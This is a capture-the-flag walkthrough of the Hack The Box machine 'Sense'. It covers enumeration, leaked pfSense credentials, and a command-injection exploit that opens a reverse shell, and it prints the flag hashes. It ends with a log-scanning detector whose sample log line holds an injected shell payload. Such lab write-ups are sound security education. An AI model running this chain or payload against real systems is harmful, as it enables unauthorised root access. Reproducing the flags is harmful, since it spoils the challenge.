[HTB] Sense

Today we are going to hack the HTB machine called Sense.
  • Enumeration
  • To start, we run a full-port nmap scan to see which ports are open. Only two are: 80 (lighttpd) and 443 (HTTPS); the other 65533 are filtered, which is why the scan takes over four minutes.
    sml@Cassandra:~$ sudo nmap -sV -sS -p- 10.10.10.60
    [sudo] password for sml:
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 17:45 CEST
    Nmap scan report for 10.10.10.60
    Host is up (0.049s latency).
    Not shown: 65533 filtered ports
    PORT    STATE SERVICE   VERSION
    80/tcp  open  http      lighttpd 1.4.35
    443/tcp open  ssl/https?

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 267.68 seconds
    Let's see whether there is anything interesting on the web server. We brute-force directories over HTTPS with the txt extension added; -k tells gobuster to skip TLS certificate verification.
    sml@Cassandra:~$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -k
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            https://10.10.10.60
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     txt
    [+] Timeout:        10s
    ===============================================================
    2020/05/12 15:57:35 Starting gobuster
    ===============================================================
    /themes (Status: 301)
    /css (Status: 301)
    /includes (Status: 301)
    /javascript (Status: 301)
    /changelog.txt (Status: 200)
    /classes (Status: 301)
    /widgets (Status: 301)
    /tree (Status: 301)
    /shortcuts (Status: 301)
    /installer (Status: 301)
    /wizards (Status: 301)
    /csrf (Status: 301)
    /system-users.txt (Status: 200)
    Two plain-text files stand out: changelog.txt and system-users.txt. We visit https://10.10.10.60/system-users.txt and find the credentials we need to log in to pfSense (the username rohit with the password pfsense is what we use later). We then check the pfSense version and look for an exploit that applies to it.
    sml@Cassandra:~$ searchsploit pfsense
    ----------------------------------- ----------------------------------------
     Exploit Title                     |  Path
                                       | (/usr/share/exploitdb/)
    ----------------------------------- ----------------------------------------
    pfSense - 'interfaces.php?if' Cros | exploits/hardware/remote/35071.txt
    pfSense - 'pkg.php?xml' Cross-Site | exploits/hardware/remote/35069.txt
    pfSense - 'pkg_edit.php?id' Cross- | exploits/hardware/remote/35068.txt
    pfSense - 'status_graph.php?if' Cr | exploits/hardware/remote/35070.txt
    pfSense - (Authenticated) Group Me | exploits/unix/remote/43193.rb
    pfSense 2 Beta 4 - 'graph.php' Mul | exploits/php/remote/34985.txt
    pfSense 2.0.1 - Cross-Site Scripti | exploits/php/webapps/23901.txt
    pfSense 2.1 build 20130911-1816 -  | exploits/php/webapps/31263.txt
    pfSense 2.2 - Multiple Vulnerabili | exploits/php/webapps/36506.txt
    pfSense 2.2.5 - Directory Traversa | exploits/php/webapps/39038.txt
    pfSense 2.3.1_1 - Command Executio | exploits/php/webapps/43128.txt
    pfSense 2.3.2 - Cross-Site Scripti | exploits/php/webapps/41501.txt
    pfSense 2.4.1 - Cross-Site Request | exploits/php/remote/43341.rb
    pfSense 2.4.4-P3 - 'User Manager'  | exploits/freebsd/webapps/48300.txt
    pfSense 2.4.4-p1 (HAProxy Package  | exploits/php/webapps/46538.txt
    pfSense 2.4.4-p1 - Cross-Site Scri | exploits/multiple/webapps/46316.txt
    pfSense 2.4.4-p3 (ACME Package 0.5 | exploits/php/webapps/46936.txt
    pfSense < 2.1.4 - 'status_rrd_grap | exploits/php/webapps/43560.py
    pfSense Community Edition 2.2.6 -  | exploits/php/webapps/39709.txt
    pfSense Firewall 2.2.5 - Config Fi | exploits/php/webapps/39306.html
    pfSense Firewall 2.2.6 - Services  | exploits/php/webapps/39695.txt
    pfSense UTM Platform 2.0.1 - Cross | exploits/freebsd/webapps/24439.txt
    ----------------------------------- ----------------------------------------
    Shellcodes: No Result
  • Exploitation
  • We choose "pfSense < 2.1.4 - 'status_rrd_grap..." (exploits/php/webapps/43560.py). Note that this is an authenticated exploit: it logs in with the credentials from system-users.txt, fetches a CSRF token, and only then fires the command injection, so the leaked file is what makes the whole chain work. We set up a netcat listener for the reverse shell...
    sml@Cassandra:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    And we launch the exploit, pointing it at the target and at our listener.
    sml@Cassandra:~$ python3 /usr/share/exploitdb/exploits/php/webapps/43560.py --rhost 10.10.10.60 --lhost 10.10.14.3 --lport 5555 --username rohit --password pfsense
    CSRF token obtained
    Running exploit...
    Exploit completed
    We get a root shell straight away :) The injected command runs with the privileges of the pfSense web GUI, which on this box is root, so there is no separate privilege-escalation step.
    sml@Cassandra:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    connect to [10.10.14.3] from (UNKNOWN) [10.10.10.60] 55495
    sh: can't access tty; job control turned off
    #
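    From the defender's side, both halves of this chain leave traces in the lighttpd access log: an unauthenticated 200 on system-users.txt, and a request to status_rrd_graph_img.php whose RRD database name is not a plain file name. The script below is an added example written for this page, not code from the walkthrough or from pfSense. It assumes lighttpd's Common Log Format and assumes, from CVE-2014-4688 rather than from the page, that the 43560.py request injects into the `database` parameter as `database=queues;<command>`; the log lines are constructed to mirror the walkthrough and are not from the machine.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample lines in lighttpd's default (Common Log Format) layout.
# They are NOT taken from the Sense machine; IPs and timestamps are made up
# to mirror the walkthrough. The last line assumes the 43560.py request shape
# (database=queues;<command>), which is an assumption about the exploit.
SAMPLE_LOG = """\
10.10.14.3 - - [11/May/2020:17:50:01 +0200] "GET /system-users.txt HTTP/1.1" 200 106
10.10.14.3 - - [11/May/2020:17:50:02 +0200] "GET /changelog.txt HTTP/1.1" 200 271
10.10.14.3 - - [11/May/2020:17:50:03 +0200] "GET /nonexistent HTTP/1.1" 404 345
10.10.10.1 - - [11/May/2020:17:51:10 +0200] "GET /status_rrd_graph_img.php?database=queues&graph=queues HTTP/1.1" 200 5120
10.10.14.3 - - [11/May/2020:17:52:30 +0200] "GET /status_rrd_graph_img.php?database=queues;printf+%22%5c156%5c143%22|sh&graph=queues HTTP/1.1" 200 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Legitimate RRD database names are plain file names (letters, digits, . _ -).
SAFE_RRD_NAME = re.compile(r'^[A-Za-z0-9_.-]+$')

# Files gobuster turned up that should never be served to an unauthenticated client.
SENSITIVE_PATHS = {"/system-users.txt", "/changelog.txt"}


def parse_line(line):
    """Return a dict of fields for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_params(query):
    """Split a raw query string on '&' only (never ';'), decoding each key/value.

    Deliberately avoids urllib.parse.parse_qs: older Python versions also split
    on ';', which would hide exactly the injection we are looking for.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def find_suspicious(log_text):
    """Scan access-log text and return (client_ip, finding, detail) tuples."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        params = query_params(url.query)
        # Command injection attempt: a database value that is not a bare file name.
        if url.path == "/status_rrd_graph_img.php":
            for value in params.get("database", []):
                if not SAFE_RRD_NAME.match(value):
                    findings.append((rec["ip"], "rrd_database_injection", value))
        # Information leak: a sensitive static file actually served (200).
        if url.path in SENSITIVE_PATHS and rec["status"] == "200":
            findings.append((rec["ip"], "sensitive_file_read", url.path))
    return findings


if __name__ == "__main__":
    for ip, kind, detail in find_suspicious(SAMPLE_LOG):
        print(f"{ip}\t{kind}\t{detail}")
```

    The allow-list check on the database name is the important part: it flags any shell metacharacter, not just the exact payload the public exploit sends, so encoding tricks such as the printf/octal wrapper do not slip past it.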
  • user.txt
  • # cd /home
    # ls
    .snap   rohit
    # cd rohit
    # ls
    .tcshrc user.txt
    # cat user.txt
    8721327cc232073b40d27d9c17e7348b
    #
  • root.txt
  • # cd /root
    # ls
    .cshrc  .first_time  .gitsync_merge.sample  .hushlogin  .login  .part_mount  .profile  .shrc  .tcshrc  root.txt
    # cat root.txt
    d08c32a5d4f8c8b10e76eb51a69f1a86
    #
  • End
  • And with that we have both the user flag and the root flag.